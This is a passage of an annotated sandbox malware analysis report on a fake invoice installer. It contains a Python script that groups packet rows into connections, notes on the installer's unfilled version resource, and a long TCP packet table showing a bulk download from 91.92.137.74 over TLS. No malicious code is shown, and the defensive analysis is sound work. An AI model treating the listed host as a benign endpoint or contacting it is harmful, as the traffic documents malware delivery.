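        print("%-36s %s" % (cap, ", ".join(apis)))
    print("to investigate:", triage(REPORT_IMPORTS, installer=True)["beyond_installer_baseline"])
```

With the installer baseline applied, only "change memory protection" and "runtime API resolution" remain, and both are also used by ordinary Delphi runtime code (its memory manager allocates with VirtualAlloc, and optional APIs are resolved with GetProcAddress), so a runtime-specific baseline would tune them out too. That is the point of the exercise: for this file the import-derived signatures carry almost no weight, and the analysis has to move to the dropped files and the network traffic.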
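Reading 695 per-packet rows one at a time is not how a practitioner uses the TCP Packets list that follows; the first step is to collapse it into connections. As an added example (editor's code, not part of the Joe Sandbox report), the script below parses rows in the list's "timestamp zone sport dport sip dip" format, groups packets by the sandbox client's (IP, port) and the remote (IP, port), counts packets in each direction and measures each connection's lifetime. The twelve rows embedded are copied from this report's table; the local-network prefix and the "server-heavy" heuristic (more packets from the server than from the client, the shape of a download) are the example's own assumptions. It also accepts the German month abbreviations (Mai) that the raw export uses.

```python
import re
from datetime import datetime

LOCAL_NET = "192.168.1."   # the analysis machine's network in this report (assumed prefix)

# Rows copied from the TCP Packets table of this report (a small subset of the 695 packets).
SAMPLE_ROWS = """\
May 7, 2018 14:49:36.631899118 CEST 63700 53 192.168.1.81 8.8.8.8
May 7, 2018 14:49:36.814659119 CEST 53 63700 8.8.8.8 192.168.1.81
May 7, 2018 14:49:36.882920027 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:36.882975101 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:36.883605003 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:50.975575924 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:51.014880896 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:51.014935017 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988152027 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988320112 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988338947 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988862991 CEST 49164 443 192.168.1.81 91.92.137.74
"""

ROW_RE = re.compile(
    r"^(?P<ts>\w+ \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+) (?P<tz>\S+) "
    r"(?P<sport>\d+) (?P<dport>\d+) (?P<sip>\S+) (?P<dip>\S+)$"
)
MONTHS_DE = {"Mär": "Mar", "Mai": "May", "Okt": "Oct", "Dez": "Dec"}   # raw export is German


def parse_timestamp(text):
    """'May 7, 2018 14:49:36.631899118' -> datetime (nanoseconds truncated to microseconds)."""
    month, rest = text.split(" ", 1)
    main, frac = rest.split(".")
    dt = datetime.strptime(MONTHS_DE.get(month, month) + " " + main, "%b %d, %Y %H:%M:%S")
    return dt.replace(microsecond=int(frac[:6].ljust(6, "0")))


def parse_rows(text):
    """Parse table rows; lines that are not packet rows (headers, page footers) are skipped."""
    packets = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            packets.append({"ts": parse_timestamp(m["ts"]), "sport": int(m["sport"]),
                            "dport": int(m["dport"]), "sip": m["sip"], "dip": m["dip"]})
    return packets


def summarize_flows(packets, local_prefix=LOCAL_NET):
    """Group packets into client->server flows; count per direction and measure lifetime."""
    flows = {}
    for p in packets:
        outbound = p["sip"].startswith(local_prefix)
        key = ((p["sip"], p["sport"], p["dip"], p["dport"]) if outbound
               else (p["dip"], p["dport"], p["sip"], p["sport"]))
        f = flows.setdefault(key, {"client": key[0], "cport": key[1], "server": key[2],
                                   "sport": key[3], "out": 0, "in": 0,
                                   "first": p["ts"], "last": p["ts"]})
        f["out" if outbound else "in"] += 1
        f["first"], f["last"] = min(f["first"], p["ts"]), max(f["last"], p["ts"])
    for f in flows.values():
        f["seconds"] = (f["last"] - f["first"]).total_seconds()
    return sorted(flows.values(), key=lambda f: f["first"])


def server_heavy(flows):
    """Flows in which the server sent more packets than the client: data flowing to the sandbox."""
    return [f for f in flows if f["in"] > f["out"]]


if __name__ == "__main__":
    for f in summarize_flows(parse_rows(SAMPLE_ROWS)):
        print("%s:%d -> %s:%d out=%d in=%d %.3fs" % (f["client"], f["cport"], f["server"],
                                                     f["sport"], f["out"], f["in"], f["seconds"]))
```

On the full table this yields three DNS exchanges with 8.8.8.8 and two connections to 91.92.137.74:443 (client ports 49162 and 49164); the second is strongly server-heavy, which is what the long runs of 443 -> 49164 rows on the following pages look like once summarised.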

Version Infos

Description Data
LegalCopyright
FileVersion
CompanyName test.
Comments This installation was built with Inno Setup.
ProductName test
ProductVersion test
FileDescription test Setup
Translation 0x0000 0x04b0

The version block is the Inno Setup default with the script's placeholder values left in ("test", "test Setup", empty LegalCopyright and FileVersion). For a file that presents itself as an invoice (facture), a version resource that no vendor ever filled in is itself a useful triage signal.

Possible Origin

Language of compilation system Country where language is spoken Map
English United States

TCP Packets

Timestamps are the sandbox's local time (CEST); 192.168.1.81 is the analysis machine. The list shows DNS lookups through 8.8.8.8 followed by two TLS connections to 91.92.137.74:443 from client ports 49162 and 49164; on the second connection, repeated runs of ten or more server-to-client segments between client acknowledgements are the pattern of bulk data flowing to the client. Because the traffic is TLS, only timing and direction are visible here; the DNS answers are not in this table (see the Contacted Domains and Contacted IPs sections).

Timestamp Source Port Dest Port Source IP Dest IP
May 7, 2018 14:49:36.631899118 CEST 63700 53 192.168.1.81 8.8.8.8

May 7, 2018 14:49:36.814659119 CEST 53 63700 8.8.8.8 192.168.1.81
May 7, 2018 14:49:36.882920027 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:36.882975101 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:36.883605003 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:37.122706890 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:37.122750998 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:49.415394068 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:49.415448904 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:49.415469885 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:49.415647984 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:49.480731964 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:49.480768919 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:49.482016087 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:49.483091116 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:50.436608076 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:50.475008965 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:50.485364914 CEST 54244 53 192.168.1.81 8.8.8.8
May 7, 2018 14:49:50.615817070 CEST 53 54244 8.8.8.8 192.168.1.81
May 7, 2018 14:49:50.626178980 CEST 60413 53 192.168.1.81 8.8.8.8
May 7, 2018 14:49:50.746747017 CEST 53 60413 8.8.8.8 192.168.1.81
May 7, 2018 14:49:50.974263906 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:50.975575924 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:50.975601912 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:50.979106903 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:50.991595984 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:50.997324944 CEST 443 49162 91.92.137.74 192.168.1.81
May 7, 2018 14:49:50.997864008 CEST 49162 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:51.014880896 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:51.014935017 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:51.016784906 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:51.018317938 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:51.018341064 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.041563988 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.041852951 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:52.057332993 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:52.057374954 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.101337910 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:52.101366997 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988152027 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988320112 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988338947 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988358021 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988365889 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988372087 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988382101 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988393068 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988401890 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988409996 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988862991 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:52.988890886 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988905907 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.988917112 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:52.989166975 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:52.989253044 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.120769024 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120812893 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120842934 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120866060 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120887041 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120913982 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120944977 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120955944 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120966911 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120978117 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.120987892 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.121303082 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.121334076 CEST 443 49164 91.92.137.74 192.168.1.81

May 7, 2018 14:49:53.121624947 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.121705055 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.226696968 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226727962 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226736069 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226742983 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226751089 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226758957 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226780891 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226788998 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226797104 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226804972 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.226811886 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.227107048 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.227152109 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.227494955 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.227615118 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.316730022 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316766977 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316776037 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316783905 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316792011 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316800117 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316824913 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316833973 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316847086 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316854954 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.316863060 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.319443941 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.319494963 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.319746017 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.323230028 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.403023005 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403064966 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403073072 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403091908 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403101921 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403112888 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403136969 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403151035 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403162003 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403172016 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403181076 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403311014 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.403352022 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.403568029 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.404103041 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.474935055 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.474960089 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.474966049 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.474972010 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.474993944 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.475011110 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.475028992 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.475034952 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.475040913 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.475045919 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.475052118 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.475305080 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.475361109 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.475653887 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.475769997 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.531871080 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.531908035 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.531923056 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.531939030 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.531956911 CEST 443 49164 91.92.137.74 192.168.1.81

May 7, 2018 14:49:53.531970978 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.532010078 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.532025099 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.532058001 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.532072067 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.532084942 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.532190084 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.532238960 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.532808065 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.590961933 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591044903 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591061115 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591082096 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591099977 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591114998 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591155052 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591171980 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591187000 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591200113 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591213942 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591227055 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.591259956 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.591809988 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.644042969 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644067049 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644083977 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644098043 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644113064 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644128084 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644154072 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644162893 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644171953 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644180059 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644187927 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644385099 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.644449949 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.644751072 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.644864082 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.690891981 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.690924883 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.690931082 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.690937042 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.690943956 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.690949917 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.690968037 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.690973997 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.691006899 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.691034079 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.691047907 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.691258907 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.691325903 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.691669941 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.691785097 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.728300095 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728332043 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728349924 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728378057 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728389978 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728396893 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728425980 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728450060 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728482962 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728499889 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728538036 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.728781939 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.728822947 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.729146004 CEST 49164 443 192.168.1.81 91.92.137.74

May 7, 2018 14:49:53.729260921 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.769251108 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769294024 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769314051 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769330025 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769344091 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769361973 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769399881 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769417048 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769429922 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769445896 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769462109 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.769674063 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.769706011 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.770011902 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.770096064 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.811321020 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811359882 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811378002 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811395884 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811413050 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811429977 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811472893 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811491013 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811507940 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811525106 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811541080 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.811955929 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.812026978 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.812336922 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.812463999 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.856477022 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856518030 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856537104 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856554031 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856570005 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856585979 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856620073 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856638908 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856654882 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856671095 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.856687069 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.857059002 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.857085943 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.857376099 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.857461929 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.898400068 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898417950 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898427010 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898437023 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898447037 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898456097 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898475885 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898484945 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898493052 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898499012 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898505926 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898684978 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.898714066 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.898977995 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.899068117 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.933890104 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.933921099 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.933938026 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.933954000 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.933968067 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.933983088 CEST 443 49164 91.92.137.74 192.168.1.81

May 7, 2018 14:49:53.934032917 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.934048891 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.934062004 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.934077978 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.934094906 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.934166908 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.934190989 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.934828997 CEST 49164 443 192.168.1.81 91.92.137.74
May 7, 2018 14:49:53.975362062 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975390911 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975413084 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975431919 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975450039 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975467920 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975534916 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975554943 CEST 443 49164 91.92.137.74 192.168.1.81
May 7, 2018 14:49:53.975572109 CEST 443 49164 91.92.137.74 192.168.1.81
